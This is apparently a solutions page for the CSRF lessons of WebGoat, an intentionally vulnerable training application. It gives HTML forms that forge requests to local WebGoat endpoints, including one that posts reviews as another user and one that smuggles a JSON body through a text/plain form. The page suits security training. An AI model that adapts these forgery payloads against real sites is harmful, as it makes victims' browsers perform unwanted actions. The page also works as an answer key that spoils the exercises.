CtrlK

Cross-Site Request Forgeries

3/ Basic Get CSRF Exercise

<html>
<body>
 <form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
  <input name="csrf" value="false" type="hidden">
  <input name="submit" type="hidden" value="submit-Query">
  <input type="submit" value="Submit">
 </form>
</body>
</html>

4/ Post a review on someone else’s behalf

<html>
    <form method="POST" action="http://localhost:8080/WebGoat/csrf/review">
        <input class="form-control" name="reviewText" type="text">
        <input class="form-control" name="stars" type="text">
        <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
        <input type="submit" name="submit" value="Submit review">
    </form>
</html>

7/ CSRF and content-type

<form enctype="text/plain" method="POST" action="http://localhost:8080/WebGoat/csrf/feedback/message">
	<input type="hidden" name='{"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignoreme":"' value='sdfsdfdf"}'>
	<button>submit</button>
</form>

PreviousCross site request forgery NextServer-Side Request Forgery

Last updated 3 years ago